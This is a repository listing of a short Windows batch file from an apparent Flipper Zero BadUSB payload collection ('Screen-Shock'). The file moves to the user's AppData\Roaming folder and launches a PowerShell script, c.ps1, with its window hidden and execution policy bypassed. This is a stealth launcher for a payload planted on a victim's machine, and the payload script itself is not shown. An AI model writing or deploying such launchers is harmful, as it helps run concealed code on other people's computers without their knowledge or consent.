flipper-zero-stuff/badusb/Screen-Shock/I.bat

4 lines
136 B
Batchfile
Raw Permalink Normal View History

2024-08-14 08:38:30 -07:00
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause